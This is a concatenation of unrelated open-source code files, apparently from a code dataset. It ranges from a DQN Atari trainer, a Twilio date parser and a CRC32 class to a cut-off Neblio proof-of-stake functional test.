else: # soft update, the 2 branches can be merged together, leaving it like this for now
raise Exception(f'Soft update is not yet implemented (hard update was used in the original paper)')
@staticmethod
def visualize_state(state):
state = state[0].to('cpu').numpy() # (1/B, C, H, W) -> (C, H, W)
stacked_frames = np.hstack([np.repeat((img * 255).astype(np.uint8)[:, :, np.newaxis], 3, axis=2) for img in state]) # (C, H, W) -> (H, C*W, 3)
plt.imshow(stacked_frames)
plt.show()
def maybe_log_episode(self):
rewards = self.env.get_episode_rewards() # we can do this thanks to the Monitor wrapper
episode_lengths = self.env.get_episode_lengths()
num_episodes = len(rewards)
if self.episode_log_freq is not None and num_episodes % self.episode_log_freq == 0:
self.tensorboard_writer.add_scalar('Rewards per episode', rewards[-1], num_episodes)
self.tensorboard_writer.add_scalar('Steps per episode', episode_lengths[-1], num_episodes)
if rewards[-1] > self.best_episode_reward:
self.best_episode_reward = rewards[-1]
self.config['best_episode_reward'] = self.best_episode_reward # metadata
self.best_dqn_model = copy.deepcopy(self.dqn) # keep track of the model that gave the best reward
def maybe_log(self):
num_steps = self.env.get_total_steps()
if self.log_freq is not None and num_steps > 0 and num_steps % self.log_freq == 0:
self.tensorboard_writer.add_scalar('Epsilon', self.dqn.epsilon_value(), num_steps)
if len(self.huber_loss) > 0:
self.tensorboard_writer.add_scalar('Huber loss', np.mean(self.huber_loss), num_steps)
self.tensorboard_writer.add_scalar('FPS', num_steps / (time.time() - self.start_time), num_steps)
self.huber_loss = [] # clear the loss values and start recollecting them again
# Periodically save DQN models
if self.checkpoint_freq is not None and num_steps > 0 and num_steps % self.checkpoint_freq == 0:
ckpt_model_name = f'dqn_{self.config["env_id"]}_ckpt_steps_{num_steps}.pth'
torch.save(utils.get_training_state(self.config, self.dqn), os.path.join(CHECKPOINTS_PATH, ckpt_model_name))
# Log the gradients
if self.grads_log_freq is not None and self.learner_cnt > 0 and self.learner_cnt % self.grads_log_freq == 0:
total_grad_l2_norm = 0
for cnt, (name, weight_or_bias_parameters) in enumerate(self.dqn.named_parameters()):
grad_l2_norm = weight_or_bias_parameters.grad.data.norm(p=2).item()
self.tensorboard_writer.add_scalar(f'grad_norms/{name}', grad_l2_norm, self.learner_cnt)
total_grad_l2_norm += grad_l2_norm ** 2
# As if we concatenated all of the params into a single vector and took L2
total_grad_l2_norm = total_grad_l2_norm ** (1/2)
self.tensorboard_writer.add_scalar(f'grad_norms/total', total_grad_l2_norm, self.learner_cnt)
def log_to_console(self): # keep it minimal for now, I mostly use tensorboard - feel free to expand functionality
print(f'Number of env steps = {self.get_number_of_env_steps()}')
def train_dqn(config):
env = utils.get_env_wrapper(config['env_id'])
replay_buffer = ReplayBuffer(config['replay_buffer_size'], crash_if_no_mem=config['dont_crash_if_no_mem'])
utils.set_random_seeds(env, config['seed'])
linear_schedule = utils.LinearSchedule(
config['epsilon_start_value'],
config['epsilon_end_value'],
config['epsilon_duration']
)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
dqn = DQN(env, number_of_actions=env.action_space.n, epsilon_schedule=linear_schedule).to(device)
target_dqn = DQN(env, number_of_actions=env.action_space.n).to(device)
# Don't get confused by the actor-learner terminology, DQN is not an actor-critic method, but conceptually
# we can split the learning process into collecting experience/acting in the env and learning from that experience
actor_learner = ActorLearner(config, env, replay_buffer, dqn, target_dqn, env.reset())
while actor_learner.get_number_of_env_steps() < config['num_of_training_steps']:
num_env_steps = actor_learner.get_number_of_env_steps()
if config['console_log_freq'] is not None and num_env_steps % config['console_log_freq'] == 0:
actor_learner.log_to_console()
actor_learner.collect_experience()
if num_env_steps > config['num_warmup_steps']:
actor_learner.learn_from_experience()
torch.save( # save the best DQN model overall (gave the highest reward in an episode)
utils.get_training_state(config, actor_learner.best_dqn_model),
os.path.join(BINARIES_PATH, utils.get_available_binary_name(config['env_id']))
)
def get_training_args():
parser = argparse.ArgumentParser()
# Training related
parser.add_argument("--seed", type=int, help="Very important for reproducibility - set the random seed", default=23)
parser.add_argument("--env_id", type=str, help="Atari game id", default='BreakoutNoFrameskip-v4')
parser.add_argument("--num_of_training_steps", type=int, help="Number of training env steps", default=50000000)
parser.add_argument("--acting_learning_step_ratio", type=int, help="Number of experience collection steps for every learning step", default=4)
parser.add_argument("--learning_rate", type=float, default=1e-4)
parser.add_argument("--grad_clipping_value", type=float, default=5) # 5 is fairly arbitrarily chosen
parser.add_argument("--replay_buffer_size", type=int, help="Number of frames to store in buffer", default=1000000)
parser.add_argument("--dont_crash_if_no_mem", action='store_false', help="Optimization - crash if not enough RAM before the training even starts (default=True)")
parser.add_argument("--num_warmup_steps", type=int, help="Number of steps before learning starts", default=50000)
parser.add_argument("--target_dqn_update_interval", type=int, help="Target DQN update freq per learning update", default=10000)
parser.add_argument("--batch_size", type=int, help="Number of states in a batch (from replay buffer)", default=32)
parser.add_argument("--gamma", type=float, help="Discount factor", default=0.99)
parser.add_argument("--tau", type=float, help='Set to 1 for a hard target DQN update, < 1 for a soft one', default=1.)
# epsilon-greedy annealing params
parser.add_argument("--epsilon_start_value", type=float, default=1.)
parser.add_argument("--epsilon_end_value", type=float, default=0.1)
parser.add_argument("--epsilon_duration", type=int, default=1000000)
# Logging/debugging/checkpoint related (helps a lot with experimentation)
parser.add_argument("--console_log_freq", type=int, help="Log to console after this many env steps (None = no logging)", default=10000)
parser.add_argument("--log_freq", type=int, help="Log metrics to tensorboard after this many env steps (None = no logging)", default=10000)
parser.add_argument("--episode_log_freq", type=int, help="Log metrics to tensorboard after this many episodes (None = no logging)", default=5)
parser.add_argument("--checkpoint_freq", type=int, help="Save checkpoint model after this many env steps (None = no checkpointing)", default=10000)
parser.add_argument("--grads_log_freq", type=int, help="Log grad norms after this many weight update steps (None = no logging)", default=2500)
parser.add_argument("--debug", action='store_true', help='Train in debugging mode')
args = parser.parse_args()
# Wrapping training configuration into a dictionary
training_config = dict()
for arg in vars(args):
training_config[arg] = getattr(args, arg)
return training_config
if __name__ == '__main__':
# Train the DQN model
train_dqn(get_training_args())
|
atcoder/abc102/b.py | Ashindustry007/competitive-programming | 506 | 12670210 | #!/usr/bin/env python3
# https://abc102.contest.atcoder.jp/tasks/abc102_b
n = int(input())
a = [int(x) for x in input().split()]
a.sort()
print(a[-1] - a[0])
|
windows/winproxy/apis/ktmw32.py | IMULMUL/PythonForWindows | 479 | 12670220 | <filename>windows/winproxy/apis/ktmw32.py
import ctypes
import windows.generated_def as gdef
from ..apiproxy import ApiProxy, NeededParameter
from ..error import fail_on_zero
class Ktmw32Proxy(ApiProxy):
APIDLL = "Ktmw32"
default_error_check = staticmethod(fail_on_zero)
@Ktmw32Proxy()
def CommitTransaction(TransactionHandle):
return CommitTransaction.ctypes_function(TransactionHandle)
@Ktmw32Proxy()
def CreateTransaction(lpTransactionAttributes, UOW, CreateOptions, IsolationLevel, IsolationFlags, Timeout, Description):
return CreateTransaction.ctypes_function(lpTransactionAttributes, UOW, CreateOptions, IsolationLevel, IsolationFlags, Timeout, Description)
@Ktmw32Proxy()
def RollbackTransaction(TransactionHandle):
return RollbackTransaction.ctypes_function(TransactionHandle)
@Ktmw32Proxy()
def OpenTransaction(dwDesiredAccess, TransactionId):
return OpenTransaction.ctypes_function(dwDesiredAccess, TransactionId)
|
algoexpert.io/python/Search_In_Sorted_Matrix.py | XSoyOscar/Algorithms | 713 | 12670271 | <reponame>XSoyOscar/Algorithms
# https://www.algoexpert.io/questions/Search%20In%20Sorted%20Matrix
# O(n + m) time | O(1) space
# where 'n' is the length of row and 'm' is the length on column
def search_in_sorted_matrix(matrix, target):
row = 0
col = len(matrix[0]) - 1
while row < len(matrix) and col >= 0:
if matrix[row][col] > target:
col -= 1
        elif matrix[row][col] < target:
row += 1
else:
return [row, col]
return [-1, -1]
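# Quick illustrative check (the sample matrix below is chosen here, not taken
# from the original exercise); every row and every column is sorted ascending.
if __name__ == "__main__":
    grid = [
        [1, 4, 7, 12],
        [2, 5, 19, 31],
        [3, 8, 24, 33],
    ]
    print(search_in_sorted_matrix(grid, 24))   # [2, 2]
    print(search_in_sorted_matrix(grid, 20))   # [-1, -1]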
|
SpoTwillio/lib/python3.6/site-packages/twilio/base/deserialize.py | Natfan/funlittlethings | 1,362 | 12670315 | import datetime
from decimal import Decimal, BasicContext
from email.utils import parsedate
import pytz
ISO8601_DATE_FORMAT = '%Y-%m-%d'
ISO8601_DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
def iso8601_date(s):
"""
Parses an ISO 8601 date string and returns a UTC date object or the string
if the parsing failed.
:param s: ISO 8601-formatted date string (2015-01-25)
:return:
"""
try:
return datetime.datetime.strptime(s, ISO8601_DATE_FORMAT).replace(tzinfo=pytz.utc).date()
except (TypeError, ValueError):
return s
def iso8601_datetime(s):
"""
Parses an ISO 8601 datetime string and returns a UTC datetime object,
or the string if parsing failed.
:param s: ISO 8601-formatted datetime string (2015-01-25T12:34:56Z)
:return: datetime or str
"""
try:
return datetime.datetime.strptime(s, ISO8601_DATETIME_FORMAT).replace(tzinfo=pytz.utc)
except (TypeError, ValueError):
return s
def rfc2822_datetime(s):
"""
Parses an RFC 2822 date string and returns a UTC datetime object,
or the string if parsing failed.
:param s: RFC 2822-formatted string date
:return: datetime or str
"""
date_tuple = parsedate(s)
if date_tuple is None:
return None
return datetime.datetime(*date_tuple[:6]).replace(tzinfo=pytz.utc)
def decimal(d):
"""
Parses a decimal string into a Decimal
:param d: decimal string
:return: Decimal
"""
if not d:
return d
return Decimal(d, BasicContext)
def integer(i):
"""
Parses an integer string into an int
:param i: integer string
:return: int
"""
try:
return int(i)
except (TypeError, ValueError):
return i
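# Illustrative calls (a quick sketch, not part of the Twilio helper module itself):
if __name__ == '__main__':
    print(iso8601_date('2015-01-25'))                 # 2015-01-25
    print(iso8601_datetime('2015-01-25T12:34:56Z'))   # 2015-01-25 12:34:56+00:00
    print(rfc2822_datetime('Sun, 25 Jan 2015 12:34:56 +0000'))
    print(decimal('3.14'), integer('42'), integer('n/a'))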
|
securityheaders/checkers/infourlcollector.py | th3cyb3rc0p/securityheaders | 151 | 12670357 | <reponame>th3cyb3rc0p/securityheaders<gh_stars>100-1000
#Collects all used URLs in a policy
from securityheaders.checkers import InfoCollector, Finding, FindingType, FindingSeverity
from securityheaders.models import ModelFactory
class InfoURLCollector(InfoCollector):
def check(self, headers, opt_options=dict()):
findings = []
headernames = ModelFactory().getheadernames()
for header in headernames:
hdr = ModelFactory().getheader(header)
try:
obj = self.extractheader(headers, hdr)
if obj and obj.parsedstring:
if hasattr(obj, 'getdirectives') and hasattr(obj,'geturls'):
for directive in obj.getdirectives():
urls = obj.geturls([directive])
if not urls:
urls = []
for url in urls:
findings.append(Finding(obj.headerkey, FindingType.INFO_URL, str(url), FindingSeverity.NONE, directive, str(url) ))
except:
pass
return findings
|
aries_cloudagent/messaging/jsonld/tests/document_loader.py | kuraakhilesh8230/aries-cloudagent-python | 247 | 12670388 | from ....vc.tests.contexts import (
CITIZENSHIP_V1,
CREDENTIALS_V1,
EXAMPLES_V1,
ODRL,
SCHEMA_ORG,
SECURITY_V1,
SECURITY_V2,
)
from . import (
TEST_EURO_HEALTH,
TEST_SIGN_OBJ0,
TEST_SIGN_OBJ1,
TEST_SIGN_OBJ2,
TEST_VALIDATE_ERROR_OBJ2,
TEST_VERIFY_ERROR,
TEST_VERIFY_OBJ0,
TEST_VERIFY_OBJ1,
TEST_VERIFY_OBJ2,
)
DOCUMENTS = {
TEST_SIGN_OBJ0["doc"]["id"]: TEST_SIGN_OBJ0["doc"],
TEST_SIGN_OBJ1["doc"]["id"]: TEST_SIGN_OBJ1["doc"],
TEST_VERIFY_ERROR["doc"]["id"]: TEST_VERIFY_ERROR["doc"],
TEST_VERIFY_OBJ0["doc"]["id"]: TEST_VERIFY_OBJ0["doc"],
TEST_VERIFY_OBJ1["doc"]["id"]: TEST_VERIFY_OBJ1["doc"],
"https://w3id.org/citizenship/v1": CITIZENSHIP_V1,
"https://www.w3.org/2018/credentials/v1": CREDENTIALS_V1,
"https://www.w3.org/2018/credentials/examples/v1": EXAMPLES_V1,
"https://www.w3.org/ns/odrl.jsonld": ODRL,
"http://schema.org/": SCHEMA_ORG,
"https://w3id.org/security/v1": SECURITY_V1,
"https://w3id.org/security/v2": SECURITY_V2,
(
"https://essif-lab.pages.grnet.gr/interoperability/"
"eidas-generic-use-case/contexts/ehic-v1.jsonld"
): TEST_EURO_HEALTH,
}
def custom_document_loader(url: str, options: dict):
# Check if full url (with fragments is in document map)
if url in DOCUMENTS:
return {
"contentType": "application/ld+json",
"contextUrl": None,
"document": DOCUMENTS[url],
"documentUrl": url,
}
# Otherwise look if it is present without fragment
without_fragment = url.split("#")[0]
if without_fragment in DOCUMENTS:
return {
"contentType": "application/ld+json",
"contextUrl": None,
"document": DOCUMENTS[without_fragment],
"documentUrl": url,
}
raise Exception(f"No custom context support for {url}")
|
MicroTokenizer/cli/commands/train.py | howl-anderson/MicroTokenizer | 136 | 12670435 | from MicroTokenizer.training.train import train_from_configure
def train(output_dir, train_data, configure_file=None):
train_from_configure([train_data], output_dir, configure_file=configure_file)
if __name__ == "__main__":
import plac
print(plac.call(train))
|
examples/io_examples/pyglet_imshow.py | penguinflys/imgviz | 171 | 12670498 | <reponame>penguinflys/imgviz
#!/usr/bin/env python
import imgviz
def get_images():
data = imgviz.data.arc2017()
yield data["rgb"]
yield imgviz.depth2rgb(data["depth"], min_value=0.3, max_value=1)
yield imgviz.label2rgb(data["class_label"])
def main():
imgviz.io.pyglet_imshow(next(get_images()), "ndarray")
imgviz.io.pyglet_run()
imgviz.io.pyglet_imshow(get_images(), "generator")
imgviz.io.pyglet_run()
imgviz.io.pyglet_imshow(list(get_images()), "list")
imgviz.io.pyglet_run()
if __name__ == "__main__":
main()
|
homeassistant/components/directv/entity.py | MrDelik/core | 30,023 | 12670528 | """Base DirecTV Entity."""
from __future__ import annotations
from directv import DIRECTV
from homeassistant.helpers.entity import DeviceInfo, Entity
from .const import DOMAIN
class DIRECTVEntity(Entity):
"""Defines a base DirecTV entity."""
def __init__(self, *, dtv: DIRECTV, address: str = "0") -> None:
"""Initialize the DirecTV entity."""
self._address = address
self._device_id = address if address != "0" else dtv.device.info.receiver_id
self._is_client = address != "0"
self.dtv = dtv
@property
def device_info(self) -> DeviceInfo:
"""Return device information about this DirecTV receiver."""
return DeviceInfo(
identifiers={(DOMAIN, self._device_id)},
manufacturer=self.dtv.device.info.brand,
name=self.name,
sw_version=self.dtv.device.info.version,
via_device=(DOMAIN, self.dtv.device.info.receiver_id),
)
|
deepcell/layers/location.py | jizhouh/deepcell-tf | 250 | 12670556 | # Copyright 2016-2021 The <NAME> at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/deepcell-tf/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# <EMAIL>
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Layers to encode location data"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Layer
from tensorflow.python.keras.utils import conv_utils
from tensorflow.python.framework import tensor_shape
logger = tf.get_logger()
class Location2D(Layer):
"""Location Layer for 2D cartesian coordinate locations.
Args:
data_format (str): A string, one of ``channels_last`` (default)
or ``channels_first``. The ordering of the dimensions in the
inputs. ``channels_last`` corresponds to inputs with shape
``(batch, height, width, channels)`` while ``channels_first``
corresponds to inputs with shape
``(batch, channels, height, width)``.
"""
def __init__(self, data_format=None, **kwargs):
in_shape = kwargs.pop('in_shape', None)
if in_shape is not None:
logger.warn('in_shape (from deepcell.layerse.location) is '
'deprecated and will be removed in a future version.')
super(Location2D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
channel_axis = 1 if self.data_format == 'channels_first' else 3
input_shape[channel_axis] = 2
return tensor_shape.TensorShape(input_shape)
def call(self, inputs):
input_shape = K.shape(inputs)
if self.data_format == 'channels_first':
x = K.arange(0, input_shape[2], dtype=inputs.dtype)
y = K.arange(0, input_shape[3], dtype=inputs.dtype)
else:
x = K.arange(0, input_shape[1], dtype=inputs.dtype)
y = K.arange(0, input_shape[2], dtype=inputs.dtype)
x = x / K.max(x)
y = y / K.max(y)
loc_x, loc_y = tf.meshgrid(x, y, indexing='ij')
if self.data_format == 'channels_first':
loc = K.stack([loc_x, loc_y], axis=0)
else:
loc = K.stack([loc_x, loc_y], axis=-1)
location = K.expand_dims(loc, axis=0)
if self.data_format == 'channels_first':
location = K.permute_dimensions(location, pattern=[0, 2, 3, 1])
location = tf.tile(location, [input_shape[0], 1, 1, 1])
if self.data_format == 'channels_first':
location = K.permute_dimensions(location, pattern=[0, 3, 1, 2])
return location
def get_config(self):
config = {
'data_format': self.data_format
}
base_config = super(Location2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Location3D(Layer):
"""Location Layer for 3D cartesian coordinate locations.
Args:
data_format (str): A string, one of ``channels_last`` (default)
or ``channels_first``. The ordering of the dimensions in the
            inputs. ``channels_last`` corresponds to inputs with shape
            ``(batch, z, height, width, channels)`` while ``channels_first``
            corresponds to inputs with shape
            ``(batch, channels, z, height, width)``.
"""
def __init__(self, data_format=None, **kwargs):
in_shape = kwargs.pop('in_shape', None)
if in_shape is not None:
logger.warn('in_shape (from deepcell.layerse.location) is '
'deprecated and will be removed in a future version.')
super(Location3D, self).__init__(**kwargs)
self.data_format = conv_utils.normalize_data_format(data_format)
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
channel_axis = 1 if self.data_format == 'channels_first' else 4
input_shape[channel_axis] = 3
return tensor_shape.TensorShape(input_shape)
def call(self, inputs):
input_shape = K.shape(inputs)
if self.data_format == 'channels_first':
z = K.arange(0, input_shape[2], dtype=inputs.dtype)
x = K.arange(0, input_shape[3], dtype=inputs.dtype)
y = K.arange(0, input_shape[4], dtype=inputs.dtype)
else:
z = K.arange(0, input_shape[1], dtype=inputs.dtype)
x = K.arange(0, input_shape[2], dtype=inputs.dtype)
y = K.arange(0, input_shape[3], dtype=inputs.dtype)
x = x / K.max(x)
y = y / K.max(y)
z = z / K.max(z)
loc_z, loc_x, loc_y = tf.meshgrid(z, x, y, indexing='ij')
if self.data_format == 'channels_first':
loc = K.stack([loc_z, loc_x, loc_y], axis=0)
else:
loc = K.stack([loc_z, loc_x, loc_y], axis=-1)
location = K.expand_dims(loc, axis=0)
if self.data_format == 'channels_first':
location = K.permute_dimensions(location, pattern=[0, 2, 3, 4, 1])
location = tf.tile(location, [input_shape[0], 1, 1, 1, 1])
if self.data_format == 'channels_first':
location = K.permute_dimensions(location, pattern=[0, 4, 1, 2, 3])
return location
def get_config(self):
config = {
'data_format': self.data_format
}
base_config = super(Location3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
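# Minimal shape-check sketch with synthetic channels_last inputs (not part of
# the original deepcell module): each layer returns normalized coordinate
# channels matching the spatial size of its input.
if __name__ == '__main__':
    print(Location2D()(tf.zeros((2, 8, 8, 3))).shape)      # (2, 8, 8, 2)
    print(Location3D()(tf.zeros((2, 4, 8, 8, 3))).shape)   # (2, 4, 8, 8, 3)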
|
test/python/tests/test_collect.py | bh107/bohrium | 236 | 12670676 | <gh_stars>100-1000
import util
class test_collect:
def init(self):
for t in util.TYPES.ALL:
cmd = "a = M.arange(%d, dtype=%s); " % (100, t)
yield cmd
def test_contract(self, cmd):
cmd += "res = a / 180.0 * 3.14"
return cmd
def test_contract_reverse(self, cmd):
cmd += "res = a * 3.14 / 180.0"
return cmd
|
tools/HackRF/firmware/tools/dumb_crc32.py | Charmve/BLE-Security-Att-Def | 149 | 12670693 | <filename>tools/HackRF/firmware/tools/dumb_crc32.py
class DumbCRC32(object):
def __init__(self):
self._remainder = 0xffffffff
self._reversed_polynomial = 0xedb88320
self._final_xor = 0xffffffff
def update(self, data):
bit_count = len(data) * 8
for bit_n in range(bit_count):
bit_in = data[bit_n >> 3] & (1 << (bit_n & 7))
self._remainder ^= 1 if bit_in != 0 else 0
bit_out = (self._remainder & 1)
self._remainder >>= 1;
if bit_out != 0:
self._remainder ^= self._reversed_polynomial;
def digest(self):
return self._remainder ^ self._final_xor
def hexdigest(self):
return '%08x' % self.digest()
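# Quick self-check sketch (assuming the intent is standard reflected CRC-32);
# it prints this implementation next to Python's zlib.crc32 for comparison.
if __name__ == '__main__':
    import zlib
    data = bytearray(b'hello hackrf')
    crc = DumbCRC32()
    crc.update(data)
    print(crc.hexdigest(), format(zlib.crc32(bytes(data)) & 0xffffffff, '08x'))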
|
anomalib/models/reverse_distillation/anomaly_map.py | openvinotoolkit/anomalib | 689 | 12670715 | """Compute Anomaly map."""
# Original Code
# Copyright (c) 2022 hq-deng
# https://github.com/hq-deng/RD4AD
# SPDX-License-Identifier: MIT
#
# Modified
# Copyright (C) 2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from typing import List, Tuple, Union
import torch
import torch.nn.functional as F
from kornia.filters import gaussian_blur2d
from omegaconf import ListConfig
from torch import Tensor
class AnomalyMapGenerator:
"""Generate Anomaly Heatmap.
Args:
image_size (Union[ListConfig, Tuple]): Size of original image used for upscaling the anomaly map.
sigma (int): Standard deviation of the gaussian kernel used to smooth anomaly map.
mode (str, optional): Operation used to generate anomaly map. Options are `add` and `multiply`.
Defaults to "multiply".
Raises:
ValueError: In case modes other than multiply and add are passed.
"""
def __init__(self, image_size: Union[ListConfig, Tuple], sigma: int = 4, mode: str = "multiply"):
self.image_size = image_size if isinstance(image_size, tuple) else tuple(image_size)
self.sigma = sigma
self.kernel_size = 2 * int(4.0 * sigma + 0.5) + 1
if mode not in ("add", "multiply"):
raise ValueError(f"Found mode {mode}. Only multiply and add are supported.")
self.mode = mode
def __call__(self, student_features: List[Tensor], teacher_features: List[Tensor]) -> Tensor:
"""Computes anomaly map given encoder and decoder features.
Args:
student_features (List[Tensor]): List of encoder features
teacher_features (List[Tensor]): List of decoder features
Returns:
Tensor: Anomaly maps of length batch.
"""
if self.mode == "multiply":
anomaly_map = torch.ones(
[student_features[0].shape[0], 1, *self.image_size], device=student_features[0].device
) # b c h w
elif self.mode == "add":
anomaly_map = torch.zeros(
[student_features[0].shape[0], 1, *self.image_size], device=student_features[0].device
)
for student_feature, teacher_feature in zip(student_features, teacher_features):
distance_map = 1 - F.cosine_similarity(student_feature, teacher_feature)
distance_map = torch.unsqueeze(distance_map, dim=1)
distance_map = F.interpolate(distance_map, size=self.image_size, mode="bilinear", align_corners=True)
if self.mode == "multiply":
anomaly_map *= distance_map
elif self.mode == "add":
anomaly_map += distance_map
anomaly_map = gaussian_blur2d(
anomaly_map, kernel_size=(self.kernel_size, self.kernel_size), sigma=(self.sigma, self.sigma)
)
return anomaly_map
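# Minimal usage sketch with synthetic feature pyramids (not part of anomalib):
# two student/teacher levels are fused into a single smoothed anomaly map.
if __name__ == "__main__":
    student = [torch.rand(2, 8, 32, 32), torch.rand(2, 16, 16, 16)]
    teacher = [torch.rand(2, 8, 32, 32), torch.rand(2, 16, 16, 16)]
    generator = AnomalyMapGenerator(image_size=(64, 64), mode="add")
    print(generator(student, teacher).shape)  # torch.Size([2, 1, 64, 64])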
|
plugins/cleanup_untagged/test/test_config.py | someengineering/resoto | 126 | 12670748 | from resotolib.config import Config
from resoto_plugin_cleanup_untagged import CleanupUntaggedPlugin
def test_config():
config = Config("dummy", "dummy")
CleanupUntaggedPlugin.add_config(config)
Config.init_default_config()
assert Config.plugin_cleanup_untagged.enabled is False
assert (
Config.plugin_cleanup_untagged.validate(Config.plugin_cleanup_untagged) is True
)
|
tests/test_visualization.py | frankiert/layout-parser | 2,931 | 12670803 | <reponame>frankiert/layout-parser<gh_stars>1000+
# Copyright 2021 The Layout Parser team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from layoutparser.elements import *
from layoutparser.ocr import *
from layoutparser.visualization import *
import cv2
import numpy as np
def test_viz():
image = cv2.imread("tests/fixtures/ocr/test_gcv_image.jpg")
ocr_agent = GCVAgent.with_credential(
"tests/fixtures/ocr/test_gcv_credential.json", languages=["en"]
)
res = ocr_agent.load_response("tests/fixtures/ocr/test_gcv_response.json")
draw_box(image, Layout([]))
draw_text(image, Layout([]))
draw_box(
image,
Layout(
[
Interval(0, 10, axis="x"),
Rectangle(0, 50, 100, 80),
Quadrilateral(np.array([[10, 10], [30, 40], [90, 40], [10, 20]])),
]
),
)
draw_text(
image,
Layout(
[
Interval(0, 10, axis="x"),
Rectangle(0, 50, 100, 80),
Quadrilateral(np.array([[10, 10], [30, 40], [90, 40], [10, 20]])),
]
),
)
for idx, level in enumerate(
[
GCVFeatureType.SYMBOL,
GCVFeatureType.WORD,
GCVFeatureType.PARA,
GCVFeatureType.BLOCK,
GCVFeatureType.PAGE,
]
):
layout = ocr_agent.gather_full_text_annotation(res, level)
draw_text(
image,
layout,
arrangement="ud" if idx % 2 else "ud",
font_size=15,
text_color="pink",
text_background_color="grey",
text_background_alpha=0.1,
with_box_on_text=True,
text_box_width=2,
text_box_color="yellow",
text_box_alpha=0.2,
with_layout=True,
box_width=1,
color_map={None: "blue"},
show_element_id=True,
id_font_size=8,
box_alpha=0.25,
id_text_background_alpha=0.25
)
draw_box(image, layout)
draw_text(image, layout) |
test/functional/feature_pos.py | HUSKI3/Neblio-Node | 138 | 12670810 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test staking in neblio
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.messages import *
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 6
self.extra_args = [[], [], [], [], [], []]
def setup_network(self, split=False):
super().setup_network()
def progress_mock_time(self, by_how_many_seconds):
assert self.curr_time is not None
self.curr_time += by_how_many_seconds
for n in self.nodes:
n.setmocktime(self.curr_time)
def reset_mock_time(self, value=None):
for n in self.nodes:
if value is None:
self.curr_time = int(time.time())
n.setmocktime(self.curr_time)
else:
assert type(value) == int
self.curr_time = value
n.setmocktime(self.curr_time)
def gen_pos_block(self, node_number, max_retries=10, average_block_time=STAKE_TARGET_SPACING, block_time_spread=10):
r = random.randrange(-block_time_spread, block_time_spread + 1)
self.progress_mock_time(average_block_time - self.last_random_time_offset + r)
self.last_random_time_offset = r
balance = self.nodes[node_number].getbalance()
if balance == 0:
raise ValueError("Node has no balance to stake")
for i in range(max_retries):
hashes = self.nodes[node_number].generatepos(1)
if len(hashes) > 0:
return hashes[0]
else:
# we progress in time to provide some window for nSearchTime vs nLastCoinStakeSearchTime
self.progress_mock_time(1)
        raise RuntimeError("Failed to stake. Max tries limit reached.")
def gen_pow_block(self, node_number, average_block_time, block_time_spread):
hashes = self.nodes[node_number].generate(1)
assert_equal(len(hashes), 1)
r = random.randrange(-block_time_spread, block_time_spread + 1)
self.progress_mock_time(average_block_time - self.last_random_time_offset + r)
self.last_random_time_offset = r
return hashes[0]
def create_tx_with_output_amounts(self, available_outputs, addresses_vs_amounts, fee=Decimal('0.1')):
total_output_amount = fee
for addr in addresses_vs_amounts:
total_output_amount += addresses_vs_amounts[addr]
total_input = 0
utxos_to_be_used = []
for input in available_outputs:
if total_input < total_output_amount:
if input['confirmations'] > COINBASE_MATURITY:
utxos_to_be_used.append(input)
total_input += input['amount']
else:
break
if total_input < total_output_amount:
logger.info("Attempting to reach value: {}".format(total_output_amount))
logger.info("Available outputs: {}".format(available_outputs))
raise ValueError("Total input could not reach the required output. Find available outputs above.")
tx_inputs = []
for input in utxos_to_be_used:
tx_inputs.append({"txid": input['txid'], "vout": input['vout']})
tx_outputs = addresses_vs_amounts
return self.nodes[0].createrawtransaction(tx_inputs, tx_outputs)
def run_test(self):
self.sync_all()
self.reset_mock_time()
self.last_random_time_offset = 0
block_time_spread = 10
average_block_time = 30
for i in range(100): # mine 100 blocks, we reduce the amount per call to avoid timing out
hash = self.gen_pow_block(0, average_block_time, block_time_spread)
# find the output that has the genesis block reward
listunspent = self.nodes[0].listunspent()
genesis_utxo = None
for utxo_data in listunspent:
if utxo_data['amount'] == Decimal('124000000.00000000'):
genesis_utxo = utxo_data
break
assert genesis_utxo is not None
# Create outputs in nodes[1] to stake them
inputs = [{"txid": genesis_utxo['txid'], "vout": genesis_utxo['vout']}]
outputs = {}
outputs_count = 220
for i in range(outputs_count):
outputs[self.nodes[1].getnewaddress()] = 500
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
signedRawTx = self.nodes[0].signrawtransaction(rawTx)
self.nodes[0].sendrawtransaction(signedRawTx['hex'])
# Create outputs in nodes[2] to stake them
